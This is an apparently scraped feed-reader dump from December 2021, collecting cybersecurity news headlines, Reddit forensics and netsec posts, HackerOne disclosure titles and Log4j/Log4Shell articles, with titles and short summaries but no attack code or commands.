    Reflections on foreign cyber exercises by ourren CaptfEncoder: a cross-platform network security tool suite by guyoung For more recent articles, visit SecWiki  ( 2 min )
  • Open

    Log4j: A forcing function to adopt long-overdue continuous security
    Are you prepared for the next big zero day exploit? Read what we learned from the Log4j crisis and what you can do to secure your assets with continuous AppSec. READ MORE  ( 4 min )
    Trends that underscore the seriousness of the cybersecurity skills gap
    It is no secret that there’s a glaring skills gap in cybersecurity. Learn more about the trends impacting AppSec success and the steps that can help bridge gaps in DevSecOps workflows. READ MORE  ( 6 min )
  • Open

    MCFE certification
    So I took the MCFE about 4 days ago, passed, and I haven't heard back from magnet about my certification. Should I contact someone or just wait a while longer? submitted by /u/bath_and_toaster [link] [comments]  ( 1 min )
    Need help on the state of and keywords for mobile device tracking in 1999
    Everybody look at their shelves and find books/software from 1999. Thank you for any pointers to books or sources. Not an attorney, just helping a friend doing life. Working up an appeal and several FOIA requests and searching for exact phrasing to use. What software/hardware/process existed in 1999 for any level of law enforcement to trace cell tower movements? Feds to state levels. Suspecting it was all tower techs as time permitted. Was any GPS data on a 2G flip worth looking at back in 1999? Looking for more than cell tower data in there maybe? Any specific references to law enforcement access to request tower pings, especially near Kentucky, 1999. (1999) My friend asked his attorneys to get the cell tower data and the lawyer contacted a tech that gave them a highly technical handwritten reply. This note was lost. Police did not produce cell data to place him at scene in a nearby state, KY. Suspect it was suppressed and it needs to be found as a purchase for software/training or Federal cooperation of some department that I am guessing at, like the FCC, FBI or the actual phone company. Thanks again! I am old school, OpenVMS VAX/Alphas ~Peace submitted by /u/OK_AquaFarmer [link] [comments]  ( 3 min )
  • Open

    CVE-2021-42287/CVE-2021-42278 Scanner & Exploiter Fork with some improvements
    submitted by /u/v1brio [link] [comments]
    Powershell .Net Assembly loader for the [CVE-2021-42287 - CVE-2021-42278] Scanner & Exploiter
    submitted by /u/v1brio [link] [comments]
  • Open

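    Logistics giant data breach, phishing attacks impersonating Pfizer | Global cybersecurity highlights for December 21
    The city government of Tulsa, USA, spent $2 million and 8 months recovering from a ransomware attack.  ( 1 min )
    PyMICROPSIA: Two-tailed Scorpion's new information-stealing trojan strikes again
    Recently, the RedDrip team of the QiAnXin Threat Intelligence Center captured attack samples built by this group in Python during routine threat hunting; samples of this kind were first discovered by a foreign vendor and named PyMICROPSIA.  ( 1 min )
    Cloud native: Kubernetes security
    As more and more enterprises move to the cloud, cloud-related scenarios are often encountered in attack-defense exercises, for example public cloud, private cloud, hybrid cloud, virtualized clusters and so on.  ( 3 min )
    How DDoS and CC attacks work (part 2)
    This article describes the protection mechanisms against DDoS and CC attacks.  ( 1 min )
    T-Mobile has blocked 21 billion scam calls this year, more than half related to vehicle warranty scams
    On average it identifies and blocks 1.8 billion attempted scam calls per month, that is, 700 attempted scam calls per second!  ( 1 min )
    Commands can be executed like this too? A study of command-execution bypasses and protection rules
    A study of command-execution bypasses and protection rules  ( 1 min )
    Hackers exploit the Log4Shell vulnerability to attack the Belgian Ministry of Defence
    The Belgian Ministry of Defence suffered a cyberattack.
    The Clop ransomware gang is leaking confidential UK police data
    The Clop ransomware gang successfully stole confidential UK police data and leaked it on the dark web.
    A study of detection and protection strategies for the Log4j2 remote code execution vulnerability
    The Log4j2 vulnerability has been public for some time, and the major security vendors have offered corresponding solutions for fixing it.
    Zero Hour Technology | Analysis of the attack on the DeFi platform Grim Finance
    On December 19, 2021, Beijing time, Grim Finance announced in a tweet that the platform had been exploited by an external attacker, who stole coins worth more than $30 million.  ( 1 min )
    Seeking out the emerging forces of China's cybersecurity industry | Preparations begin for the first "New Forces in Cybersecurity" conference
    With the convening of the "CIS 2021 Cybersecurity Innovation Conference, Spring edition", preparations for the first "New Forces in Cybersecurity" have officially begun.
    Meta files lawsuits over phishing attacks
    Meta is filing a series of lawsuits against phishing attackers and people who abuse the platform for malicious purposes.  ( 1 min )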
  • Open

    admin password disclosure via log file
    Acronis disclosed a bug submitted by darkdream: https://hackerone.com/reports/1121972 - Bounty: $100
    Log4j RCE on https://judge.me/reviews
    Judge.me disclosed a bug submitted by bhishma14: https://hackerone.com/reports/1427589 - Bounty: $50
  • Open

    USA Movies
    submitted by /u/Yankeeslv [link] [comments]  ( 1 min )
  • Open

    Custom Metasploit Module for Log4Shell Scanner
    In this article, we will discuss a customized Metasploit module I wrote for scanning applications vulnerable to Log4Shell as well as how… Continue reading on Medium »  ( 3 min )

  • Open

    Is it possible to encrypt my browsing data in a public wi-fi without using a VPN?
    I've been thinking a lot about this since recently a coffee shop near me opened, and it had open wifi. I do not want to pay for a VPN since I do not trust them for my data to show up as encrypted into the network. I found this on GitHub, but I have not tested it enough to see if it works. So can someone give any help with that? submitted by /u/ArturEPinheiro777 [link] [comments]  ( 2 min )
    Best Practices with Email DLP Exceptions
    Hey Guys, So we have our entire org covered with email DLP from O365, one of our vendors generally deals with sensitive data (social security numbers) and thus has requested to have an exception for them, what should be the best way to deal with it. Bypassing the entire DLP policy for an email ID although sounds easy but wanted to hear back some feedback on the best practices submitted by /u/w33ha_AD [link] [comments]  ( 1 min )
    I've read about multiple data breaches at US cell phone carriers (ex: AT&T, T-Mobile). Where is this data going? Is there a way I can see if my information is floating around and how widely it is distributed?
    Basically, these hacks are pretty significant and I'd like to know both the depth and breadth of what people know about my personal information. Inb4: It's all out there, I suppose it is, but I want to know the specifics, if only out of curiosity. Like, if one alpha hacker knows and doesn't share it with anybody, I'm probably good because I'm neither rich nor famous enough to really draw his or her attention. If it's out in the open for all to see, on the other hand, somebody might harass me. I use a Yubikey so I'm good there. Thank you! submitted by /u/iExtrapolate314 [link] [comments]  ( 2 min )
    Owning Internal networks is way too easy, what could Microsoft do to improve the situation?
    It's more surprising when you don't get domain admin. So many things are broken, the terrible implementation of name resolution, machines caching login credentials, passing the hash, golden tickets, NTLM relay, IPv6, WPAD, the list goes on. Surely there must be a better way. What are some improvements you would like to see from Microsoft? submitted by /u/ImTheMaddest [link] [comments]  ( 6 min )
  • Open

    Intruding 5G SA core networks from outside and inside
    submitted by /u/sebazzen [link] [comments]
    OSS Getting Hammered for BigCorp Failures
    submitted by /u/GelosSnake [link] [comments]  ( 1 min )
    Inside a PBX - Discovering a Firmware Backdoor
    submitted by /u/RedTeamPentesting [link] [comments]  ( 1 min )
    letme.go - A minimalistic Meterpreter stager written in Go
    submitted by /u/0xdea [link] [comments]  ( 1 min )
    Log4j Vulnerability CVE-2021-45105: What You Need to Know (and how it differs from CVE-2021-45046)
    submitted by /u/ScottContini [link] [comments]  ( 1 min )
  • Open

    A Simple Geolocation Exercise
    In September 2020, British army paratroopers performed a joint training exercise with Ukrainian armed forces as part of Exercise Joint… Continue reading on Medium »  ( 3 min )
    How Not to Get “Caught” — An OPSEC (Operational Security) Advice Aware Analysis of a Modern…
    Have you ever dreamed of getting “caught” and actually making the headlines with your latest research that also includes the digitally… Continue reading on Medium »  ( 4 min )
    Setting them Straight — 10 Years Back in the Future — A Brief Overview of the Hacker Scene Circa…
    Do you remember the hacker scene circa the 90s? Check out this brief analysis of the Scene up to present day back then. Keep reading. Continue reading on Medium »  ( 5 min )
  • Open

    An adorable twenty-seven second stop-motion video titled, "themonster.mov"
    submitted by /u/HGMIV926 [link] [comments]  ( 2 min )
    pictures of britain
    submitted by /u/PM_ME_TO_PLAY_A_GAME [link] [comments]  ( 1 min )
    Betty's recipes.
    submitted by /u/PM_ME_TO_PLAY_A_GAME [link] [comments]  ( 1 min )
    Sharing my movie theme music collection
    submitted by /u/ercohn [link] [comments]  ( 1 min )
    X Files complete series 1080p (English and Spanish subs)
    submitted by /u/Skajuan [link] [comments]  ( 1 min )
  • Open

    Inverting PhotoDNA with Machine Learning
    submitted by /u/anishathalye [link] [comments]  ( 1 min )
    X-Ways handling of ad1 images
    Does X-Ways have an issue with ad images? I currently have at least 200 ad1 images from a 750gb disk unallocated space. I need to do data carving on the totality of the images. When doing “refine volume snapshot” one image at a time, I sometimes have files that do not really represent what I am searching for. For example, on one image I could carve 18 files, all mp3 files. These are not the files I am looking for. I am searching for doc/docx files that I know are there (we did live forensic before acquiring the hdd). What are your thoughts on this? submitted by /u/MisterTroubadour [link] [comments]  ( 3 min )
  • Open

    SecWiki News 2021-12-20 Review
    SecWiki Weekly (issue 407) by ourren Introduction to CIS (part 2): CIS Benchmark & CIS Community Defense Model 2.0 by ourren For more of the latest articles, visit SecWiki  ( 2 min )
  • Open

    Shellcode Generation with The Radare2 Framework
    submitted by /u/DLLCoolJ [link] [comments]
  • Open

    Log4j Vulnerability – What You Need to Know and How to Address Immediately
    Article URL: https://www.crestdatasys.com/blogs/log4j-vulnerability-what-you-need-to-know-and-how-to-address-immediately/ Comments URL: https://news.ycombinator.com/item?id=29622121 Points: 3 # Comments: 0  ( 4 min )
    Apache Log4j 2 vulnerability – Detection and fix simplified in your Java code
    Article URL: https://medium.com/@amitsoni4774/apache-log4j-2-vulnerability-detection-and-fix-simplified-in-your-java-code-9a6dd1d06796 Comments URL: https://news.ycombinator.com/item?id=29620987 Points: 2 # Comments: 0  ( 2 min )
  • Open

    Fuzzing
    Article URL: https://owasp.org/www-community/Fuzzing Comments URL: https://news.ycombinator.com/item?id=29620816 Points: 2 # Comments: 0  ( 4 min )

  • Open

    Moving my server sooo grab what you want. Super fast speeds TV/Music/Movies
    submitted by /u/Bryan2pointOh [link] [comments]  ( 1 min )
    What's your F***ing problem ?
    Hi everyone. I would like to talk about a subject that I consider abnormal. First of all I would like to clarify that: - I would like to apologize for this off topic - This post does not concern the 99% of OpenDirectories users, whom I also thank to keep this subreddit alive and for their work. - I would like to thank the moderation team, who do an excellent job. - I don't give a damn about karma points, my account can drop to -10,000, I don't care, it's just an "aesthetic feature". There are times when some users post sites that they haven't thoroughly reviewed, and that's okay. In these publications, it happens that some content is illegal, immoral or whatever ... It is not the fault of the users who provided the link, it is something that happens. But why, for cryi…  ( 4 min )
  • Open

    log4j — Getting to 2.16 and 2.17 is Only Critical If You Have Non-Default Logging Enabled
    submitted by /u/danielrm26 [link] [comments]  ( 2 min )
    Alan c2 post-exploitation framework v5.0 - All you can in-memory edition
    submitted by /u/aparata_s4tan [link] [comments]
  • Open

    All in One SEO Plugin Vulnerability Affects 3M Sites
    Article URL: https://www.searchenginejournal.com/all-in-one-seo-vulnerability-2021/430230/ Comments URL: https://news.ycombinator.com/item?id=29615935 Points: 1 # Comments: 0  ( 4 min )
    Understanding the Impact of Apache Log4j Vulnerability
    Article URL: https://security.googleblog.com/2021/12/understanding-impact-of-apache-log4j.html Comments URL: https://news.ycombinator.com/item?id=29611871 Points: 2 # Comments: 0  ( 6 min )
    Deep Understanding of Commits for Automated Vulnerability Identification
    Article URL: https://sites.google.com/view/du-commits/ Comments URL: https://news.ycombinator.com/item?id=29611738 Points: 1 # Comments: 0  ( 1 min )
    Xcode 13.2 contains Log4j vulnerability
    Article URL: https://developer.apple.com/forums/thread/696785 Comments URL: https://news.ycombinator.com/item?id=29610913 Points: 181 # Comments: 41  ( 4 min )
  • Open

    GDB/Pedas Help
    I've set up GDB and Peda, and peda works fine except some commands require sudo. However, whenever I run GDB with sudo, it loads plain GDB without peda. I've edited the .gdbinit file as the instructions say. Any help would be appreciated. submitted by /u/Radiant-Midnight-278 [link] [comments]
  • Open

    I made a tool to cover your tracks post-exploitation on Linux machines for Red Teamers
    submitted by /u/mufeedvh [link] [comments]  ( 1 min )
    Alan c2 post-exploitation framework v5.0 - All you can in-memory edition
    submitted by /u/aparata_s4tan [link] [comments]  ( 1 min )
  • Open

    The Insidious Need for Speed
    “We need it yesterday. Speed kills. Coffee is for closers. First to market. If you’re in control, you’re not going fast enough.” Continue reading on Medium »  ( 4 min )
    OSINT CASE STUDY 1
    disclaimer: education purpose only Continue reading on Medium »  ( 2 min )
    Uncovering the hackers, who stole your Facebook account
    About 6-months ago I was sitting at my desk, working on my CS145 homework, when I heard a familiar ding, a new message on Facebook… Continue reading on Medium »  ( 4 min )
  • Open

    SecWiki News 2021-12-19 Review
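    In-depth analysis of SPEL expression injection vulnerabilities by ourren Detecting CobaltStrike based on anomalous behavior by ourren Exploring an HTTP asset identification method based on rule vectorization by ourren A brief look at passive IAST products and their technical implementation: code implementation demo by ourren A brief look at passive IAST products and their technical implementation: fundamentals by ourren Bug hunting with Codeql? by ourren Incident response: how to trace an attack when there are no traces by ourren Several niche but practical remote-control tools by ourren Details of the iMessage zero-click exploit made public by ourren ACSAC 2021 accepted papers list by ourren For more of the latest articles, visit SecWiki  ( 2 min )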
  • Open

    digital world.local: Vengeance Vulnhub Walkthrough
    Donavan’s VENGEANCE (digitalworld.local: VENGEANCE) is a medium level machine designed for Vulnhub. This lab includes a difficult exploitation procedure that is suitable for those experienced The post digital world.local: Vengeance Vulnhub Walkthrough appeared first on Hacking Articles.  ( 7 min )
  • Open

    Unauthorized access to choice.av.ru control panel
    Azbuka Vkusa disclosed a bug submitted by wocat: https://hackerone.com/reports/963161 - Bounty: $100
    Open redirect (DOM-based) on av.ru via "return_url" parameter (Login form)
    Azbuka Vkusa disclosed a bug submitted by zophi: https://hackerone.com/reports/958864 - Bounty: $100
    Dependency repository hijacking aka Repo Jacking from GitHub repo rubygems/bundler-site & rubygems/bundler.github.io + bundler.io docs
    RubyGems disclosed a bug submitted by akincibor: https://hackerone.com/reports/1430405
  • Open

    [Cullinan #24] Add ESI Injection and Update Others
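    This is Cullinan update log #24. I added ESI Injection, added RCE-related content to SSTI, and updated the tools. Finally, I modified part of the design of Cullinan's main page (removed max-width). Add ESI Injection Update SSTI (Add RCE, Update Tools) Update Cullinan Design ESI Injection is an item I shared as a blog post more than three years ago; it is not a case that comes up often in practice, so I had forgotten about it until I recently added it to Cullinan. It is still an interesting vulnerability, so I recommend reading about it at least once :D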
  • Open

    Trip.com: First Step towards Cloud Native Security
    TL; DR This post shares our explorations on cloud native securities for Kubernetes as well as legacy workloads, with CiliumNetworkPolicy for L3/L4 access control as the first step. TL; DR 1 Introduction 1.1 Access control in Kubernetes 1.2 Implementation and extension in Cilium 1.3 Challenges in large deployments 1.4 Organization of this post 2 Access control: from requirements to a solution 2.1 Policy enforcement in a single cluster 2.2 Policy enforcement over multiple clusters 2.2.1 ClusterMesh 2.2.2 KVStoreMesh 2.3 Policy enforcement over legacy clients 2.3.1 CiliumExternalResource (CER) 2.3.2 cer-apiserver 2.3.3 Sum up: a hybrid data plane 2.4 Control plane 2.4.1 Access control policy (ACP) modeling 2.4.2 Enforcer-specific adapters 2.4.3 Push (and reconc…

  • Open

    Log4j 2.17.0 released, for third CVE (CVE-2021-45105)
    Article URL: https://logging.apache.org/log4j/2.x/index.html Comments URL: https://news.ycombinator.com/item?id=29609578 Points: 3 # Comments: 2  ( 5 min )
    Third High Severity CVE in Log4j Is Published
    Article URL: https://logging.apache.org/log4j/2.x/security.html Comments URL: https://news.ycombinator.com/item?id=29604097 Points: 430 # Comments: 306  ( 11 min )
  • Open

    Patch fixing critical Log4j 0-day has its own vulnerability that’s under exploit
    Article URL: https://arstechnica.com/information-technology/2021/12/patch-fixing-critical-log4j-0-day-has-its-own-vulnerability-thats-under-exploit/ Comments URL: https://news.ycombinator.com/item?id=29609295 Points: 2 # Comments: 0  ( 3 min )
    Apache Log4j Vulnerability Webinar – What You Need to Know
    Article URL: https://www.criticalinsight.com/resources/news/article/apache-log4j-vulnerability-webinar-what-you-need-to-know/ Comments URL: https://news.ycombinator.com/item?id=29608959 Points: 1 # Comments: 0  ( 2 min )
  • Open

    How.It.Made
    submitted by /u/ohimjustakid [link] [comments]  ( 1 min )
    A few directories with small amount of music
    Index of /stuff/mp3/amd (audio.msk.ru) Index of /music/funk (czyborra.com) Index of /files (rarekindrecords.co.uk) Index of /audio/ (martindoyleflutes.com) (music from an irish flute player) Index of /files/mp3 (saparov.ru) Index of /albums/4151 (soton.ac.uk) submitted by /u/International_Milk_1 [link] [comments]  ( 1 min )
    Want to know some line-dancing moves? Here's some PDFs that show you some dance steps.
    submitted by /u/HGMIV926 [link] [comments]  ( 1 min )
  • Open

    Reasons to go looking in the Registry
    Chris Sanders tweeted out an interesting pair of questions recently, and the simple fact is that for me to fully answer the question, the tweet thread would be just too extensive. The questions were: What are the most common reasons you go looking in the Windows registry? What do you use it to prove most? Like almost everything else in DFIR, my response to both questions is, it depends. Why? Well, it depends upon the goals of your investigation. What I use the Registry to prove depends heavily on what I'm trying to prove, or to disprove. This may sound pretty obvious, and even intuitive, but far too often in DFIR, we can find ourselves far too easily chasing down rabbit holes that have little, if anything, to do with our investigative goals. Configuration The Windows Registry holds a g…  ( 7 min )
  • Open

    Preferred method of collecting folders or loose documents on Macs ?
    I'm using Sumuri Recon and looking through the features but it seems to be an all or nothing product (imaging the entire disk/volume). This is not confirmed by any means. I haven't spent enough time with Sumuri but it doesn't appear to allow for collection of specific folders. Anyone here have experience with small targeted forensically sound collections on Macs? The hardware dongle makes this a small pain point as it would be nice to remotely preserve a few documents in a defensible manner. This is very simple when dealing with Windows devices where FTK imager can be installed and executed within seconds. Anyone aware of a Mac APFS equivalent? This particular remote MacBook pro is on Catalina (APFS) and I have all the keys to the castle. I'm not as interested in preserving extended Metadata as I am in the plain created and modified date. Perhaps a zipping solution that preserves these two dates? submitted by /u/zero-skill-samus [link] [comments]  ( 1 min )
    How does forensic imaging of locked cellular devices work?
    I've been looking into mobile forensics and I've realized that everything I come across pertaining to imaging a filesystem starts with "Unlock the device". This doesn't quite make sense to me, because if an LEO gets a warrant to search a phone, the owner obviously doesn't have to tell them/enter the password. And from what I can tell, the only way to really "get" the password starts off with imaging the filesystem/creating a backup. Am I missing something? submitted by /u/Fusiondew [link] [comments]  ( 4 min )
    CCTV went down
    Hello to all forensicators, We have a weird situation where about 20 of our CCTVs just stopped recording. One of our external vendors was running a VAPT test on the vlan containing the cameras at the same time they went down. The CCTV logs show us that XSS and SQL injection attacks were being run on the cameras. Checking the application log tells us the time when the cameras stopped recording and the time they got back online. However I am unable to figure out what was the exact attack that brought down the cameras. What logs should I be looking at to figure this out? submitted by /u/indianadmin [link] [comments]  ( 1 min )
    VPN data exfiltration
    A colleague of mine was referencing someone using a Kali Linux USB drive on a windows 10 machine and connecting to a VPN. They believe the individual was pushing business related data through the VPN that was unauthorized. Is there anything forensically that one could look for on what might have gone outbound on the EO1? submitted by /u/WhoAteTheLastCookie [link] [comments]  ( 2 min )
  • Open

    A Detailed Guide on Log4J Penetration Testing
    In this article, we are going to discuss and demonstrate in our lab setup, the exploitation of the new vulnerability identified as CVE-2021-44228 affecting the The post A Detailed Guide on Log4J Penetration Testing appeared first on Hacking Articles.  ( 8 min )
  • Open

    SecWiki News 2021-12-18 Review
    Reproducing the CVE-2016-7124 deserialization vulnerability by SecIN community For more of the latest articles, visit SecWiki  ( 2 min )
  • Open

    ESI(Edge Side Include) Injection
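    🔍 Introduction ESIi stands for ESI (Edge Side Include) Injection and refers to an injection attack against that markup in environments that use ESI. ESI is short for Edge Side Include, a simple markup language used to define web page components for the dynamic assembly and delivery of web applications at the edge of the Internet. It is a standard set of tags for page assembly and is used in architectures such as web caches and load balancers. Within HTML code, ESI appears as tags like the ones below, which are processed in advance by a cache server or similar component capable of handling ESI before the response body reaches the web browser.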
  • Open

    HackMyVM — Forbidden
    Writeup (Spanish) Continue reading on Medium »  ( 3 min )
    Should You Trust Your Admin Tools?
    No, not really Continue reading on Medium »  ( 4 min )
  • Open

    Stored XSS on 1.4.0
    ImpressCMS disclosed a bug submitted by tehwinsam: https://hackerone.com/reports/1331281
    HTML injection in email content during registration via FirstName/LastName parameter
    MTN Group disclosed a bug submitted by ibrahimatix_: https://hackerone.com/reports/1256496
    Flickr Account Takeover using AWS Cognito API
    Flickr disclosed a bug submitted by lauritz: https://hackerone.com/reports/1342088 - Bounty: $7550
  • Open

    Alternative Process Injection
    submitted by /u/dmchell [link] [comments]
  • Open

    lurch1317: A new pidgin plugin with strong crypto for deniability (WIP)
    submitted by /u/hardenedvault [link] [comments]  ( 1 min )
    Log4j version 2.17.0 fixes a new problem CVE-2021-45105 DoS vuln (CVSS score of 7.5)
    submitted by /u/ScottContini [link] [comments]  ( 2 min )
  • Open

    [Day 16] OSINT Ransomware Madness | Advent of Cyber 3 (2021)
    OSINT stands for Open Source Intelligence, information that can be obtained from free and public sources. Offensive teams commonly use… Continue reading on Medium »  ( 3 min )

  • Open

    Threat Intelligence on Log4j CVE: Key Findings and Their Implications
    Article URL: https://www.akamai.com/blog/security/threat-intelligence-on-log4j-cve-key-findings-and-their-implications Comments URL: https://news.ycombinator.com/item?id=29599546 Points: 1 # Comments: 0  ( 6 min )
    Security in context: When is a CVE not a CVE?
    Article URL: https://snyk.io/blog/when-is-a-cve-not-a-cve/ Comments URL: https://news.ycombinator.com/item?id=29589692 Points: 2 # Comments: 0  ( 5 min )
    Bypass of allowedLdapHost check in Log4j 2.15.0 – Log4Shell (CVE-2021-44228)
    Article URL: https://twitter.com/marcioalm/status/1471740771581652995 Comments URL: https://news.ycombinator.com/item?id=29588947 Points: 3 # Comments: 1  ( 1 min )
    Risk analysis of Log4Shell (CVE-2021-44228) and mitigation
    Article URL: https://hardenedvault.net/2021/12/17/analysis-CVE-2021-44228.html Comments URL: https://news.ycombinator.com/item?id=29587870 Points: 1 # Comments: 0  ( 4 min )
  • Open

    If You're Not Doing Continuous Asset Management You're Not Doing Security
    submitted by /u/danielrm26 [link] [comments]  ( 3 min )
    Fail2ban / Regexp rule against LOG4J vuln
    submitted by /u/AGS42 [link] [comments]
    Log4Shell Update: Full bypass found in log4j 2.15.0, enabling RCE again (with payload)
    submitted by /u/freeqaz [link] [comments]  ( 2 min )
  • Open

    A website's gone
    What happened to the.eye? Is it dead, dead or is there a second website? Also, the link to the discord that the automod gave me was invalid. submitted by /u/Sleepingpiranha [link] [comments]  ( 2 min )
    A large collection of indiscriminately-named mp3 music.
    submitted by /u/HGMIV926 [link] [comments]  ( 1 min )
    Sparks albums
    submitted by /u/International_Milk_1 [link] [comments]  ( 1 min )
  • Open

    html injection at judge.me
    Judge.me disclosed a bug submitted by 0xteles: https://hackerone.com/reports/1036995
    Reflected Cross-Site Scripting/HTML Injection
    Informatica disclosed a bug submitted by jak0_: https://hackerone.com/reports/1379158
  • Open

    SecWiki News 2021-12-17 Review
    No news updates yet today~ For more of the latest articles, visit SecWiki  ( 2 min )
  • Open

    CALDERA
    Hey everyone, Does anyone here use or have used CALDERA? A small question regarding initial access; Are we meant to deploy an agent locally then do lateral movement within the network to reach other target machines? Thank you! submitted by /u/lifeislemon_not_cake [link] [comments]  ( 1 min )
  • Open

    Apache Log4j 2, Flexera and you
    By now, you’ve probably learned of Apache Log4j 2. As reported across the web, there is the recently disclosed CVE-2021-44228 vulnerability in Apache Log4j 2 (widely referred to as Log4Shell) affecting organizations far and wide. This is a critical vulnerability in Apache Log4j 2, impacting versions from 2.0-beta9 to 2.14.1. And now you’ve likely been asking, “Where is this vulnerability within my own IT ecosystem, and how do I mitigate it if necessary?” Flexera is helping work through the issue with our customers by ensuring immediate visibility of the impact of this and other vulnerabilities within their IT estate. Flexera…
  • Open

    Extract sms messages from Google Backup? Cellebrite failed on Android/Samsung
    I've tried using Cellebrite Cloud to extract messages from a Google drive Android backup (Android sends Google backups to Google Drive). It failed to parse after running several tests using my own device. I also tried to access my Samsung backup which includes messages. Cellebrite Cloud failed to login at all. Has anyone had any success accessing or extracting sms from Android Google backups or Samsung backups? It's unfortunate when tools provide that service yet fail to perform. submitted by /u/zero-skill-samus [link] [comments]  ( 2 min )

  • Open

    CHFI 2021 Exam Review
    As some of you may know, CHFI is considered to be the base line of computer forensics certifications which is why I thought that buying a test and course from EC-Council would be the place to start. I will lay out the topics that I was NOT expecting to get tested on. Let me preface by saying that there is NO one study guide out there that will prepare you for your test. You will hear people saying "I didn't study and still passed/I studied for two weeks and passed." Unless, you've worked as a SOC Analyst or have 2 years of prior computer forensics, you will fail. I began studying in January of this year and took the test in October. I failed with a 57%. While you need a 75%~ to pass, there are things the EC-Council test prep package did NOT prepare me for and the only reason why I got…  ( 4 min )
    SUMURI RECON ITR now has the ability to physically image M1, M1 Max, and M1 Pro Mac computer
    submitted by /u/acw750 [link] [comments]  ( 1 min )
    Detecting RAID parameters for rebuild
    Hi all, I have 3 E01 raid discs from a QNAP device, which I try to rebuild. X-Ways, OS Forensics and mdadm don't recognize the raid parameters automatically. So the day has finally come to learn more about raid.... Is there somebody here who can point me to some good reading on how to extract these parameters from the discs? Thanks in advance! submitted by /u/Lizzy4235 [link] [comments]  ( 1 min )
  • Open

    Google storage bucket takeover which is used to load JS file in dashboard.html in "github.com/kubernetes/release" which can lead to XSS
    Kubernetes disclosed a bug submitted by codermak: https://hackerone.com/reports/1398706 - Bounty: $100
    Race Condition Vulnerability when creating profiles
    Showmax disclosed a bug submitted by ibrahimatix_: https://hackerone.com/reports/1428690
    Able to access private picture/video/writing when requesting for their JSON response
    FetLife disclosed a bug submitted by trieulieuf9: https://hackerone.com/reports/1424291 - Bounty: $250
    Broken Link Takeover from kubernetes.io docs
    Kubernetes disclosed a bug submitted by codermak: https://hackerone.com/reports/1398572 - Bounty: $100
    Broken Github Link Used in deployment docs of "github.com/kubernetes/kompose"
    Kubernetes disclosed a bug submitted by codermak: https://hackerone.com/reports/1398617 - Bounty: $100
  • Open

    digital world.local: FALL Vulnhub Walkthrough
    FALL (digitalworld.local: FALL) is a medium level machine created by Donavan for Vulnhub. This lab is appropriate for some experienced CTF players who wish to The post digital world.local: FALL Vulnhub Walkthrough appeared first on Hacking Articles.  ( 5 min )
    Thales1 Vulnhub Walkthrough
    “Thales” is a Capture the Flag challenge available on Vulnhub. MachineBoy deserves credit for developing this box. In this box, we will learn how to The post Thales1 Vulnhub Walkthrough appeared first on Hacking Articles.  ( 6 min )
  • Open

    Forgiveness
    I forgive you for your first lies. I forgive myself for believing into it. Continue reading on Medium »  ( 1 min )
  • Open

    Mitigating the Log4Shell vulnerability (CVE-2021-44228) on DietPi
    Article URL: https://dietpi.com/blog/?p=1172 Comments URL: https://news.ycombinator.com/item?id=29581625 Points: 2 # Comments: 0  ( 5 min )
    Securing K8s clusters for Log4j CVE-2021-44228
    Article URL: https://github.com/kubearmor/log4j-CVE-2021-44228 Comments URL: https://news.ycombinator.com/item?id=29573520 Points: 1 # Comments: 0  ( 7 min )
  • Open

    Old programs for WIN & MAC (Office 95, Encarta, iLife, etc) and ISOs
    Aux francais mostly http://145.239.62.120/download_center/repos/Applications/ http://145.239.62.120/download_center/repos/ISOs/ submitted by /u/SexRevolutionnow [link] [comments]  ( 1 min )
  • Open

    SecWiki News 2021-12-16 Review
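    Research on detection and protection strategies for the Log4j2 remote code execution vulnerability by ourren. For more of the latest articles, visit SecWiki  ( 2 min )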
  • Open

    Nighthawk 0.1 - New Beginnings - @MDSecLabs
    submitted by /u/dmchell [link] [comments]  ( 1 min )

  • Open

    Guidance for preventing, detecting, and hunting for CVE-2021-44228 Log4j 2 exploitation - Microsoft Security Blog
    submitted by /u/dmchell [link] [comments]  ( 1 min )
    My road map !! Need help
    This is my roadmap to be a red teamer. Does anything need to change? 1- learn programming ---python ---C/C++ 2-Networking and OS ---Linux ---IT and Networking Basics ---THM Pre security path 3-Web Security ---THM Web fundamentals path ---OWASP TOP 10 Guide 4-Hacking Basics ---THM Complete beginner path ---INE PTS Course ---THM jr penetration tester path 5- Doing CTFs ---THM ---Hack the box ---Vulnhub 6-The OSCP 7-Red team Certs ---pentester academy CRTP ---pentester academy CRTE ---Offensive security OSCE ---NOTES--- I am a computer science student. I have learned C++ and python scripting and linux command line submitted by /u/Ok_Attempt_3411 [link] [comments]  ( 2 min )
    Guys, does anyone know anything about 7asecurity.com course content?
    Guys, does anyone know anything about 7asecurity.com course content? submitted by /u/Select_Plane_1073 [link] [comments]  ( 1 min )
  • Open

    Windows Credential Manager for hackers
    Windows can store credentials for easy reuse. There are several ways to access them. Continue reading on System Weakness »  ( 3 min )
    Runas for hackers
    Please, refer to the post on Credential Manager if you are interested in seeing how to manage stored credentials in windows. This will be… Continue reading on System Weakness »  ( 4 min )
    HackMyVM — Twisted
    Writeup (Spanish) Continue reading on Medium »  ( 2 min )
  • Open

    Hot-patch CVE-2021-44228 by exploiting the vulnerability itself
    Article URL: https://github.com/qingtengyun/cve-2021-44228-qingteng-online-patch Comments URL: https://news.ycombinator.com/item?id=29571694 Points: 1 # Comments: 0  ( 1 min )
    Exploiting and Mitigating CVE-2021-44228: Log4j Remote Code Execution (RCE)
    Article URL: https://sysdig.com/blog/exploit-detect-mitigate-log4j-cve/ Comments URL: https://news.ycombinator.com/item?id=29569587 Points: 2 # Comments: 0  ( 10 min )
    Protection against CVE-2021-45046, the additional Log4j RCE vulnerability
    Article URL: https://blog.cloudflare.com/protection-against-cve-2021-45046-the-additional-log4j-rce-vulnerability/ Comments URL: https://news.ycombinator.com/item?id=29568125 Points: 3 # Comments: 0
    Log4j Vulnerability (CVE-2021-44228)
    Article URL: https://github.com/NCSC-NL/log4shell Comments URL: https://news.ycombinator.com/item?id=29563247 Points: 2 # Comments: 0  ( 3 min )
    Google Chrome Zero Day CVE-2021-4102, Use after free in V8
    Article URL: https://chromereleases.googleblog.com/2021/12/stable-channel-update-for-desktop_13.html Comments URL: https://news.ycombinator.com/item?id=29561740 Points: 82 # Comments: 27  ( 6 min )
  • Open

    Weak rate limit could lead to ATO due to weak password protection mechanisms
    Reddit disclosed a bug submitted by bombon: https://hackerone.com/reports/1065186 - Bounty: $100
    No rate limit on password reset leads to email enumeration at gateway-production.dubsmash.com
    Reddit disclosed a bug submitted by cracker922: https://hackerone.com/reports/1425884
    Untitled
    VK.com disclosed a bug submitted by executor: https://hackerone.com/reports/584582 - Bounty: $500
    reflected xss in e.mail.ru
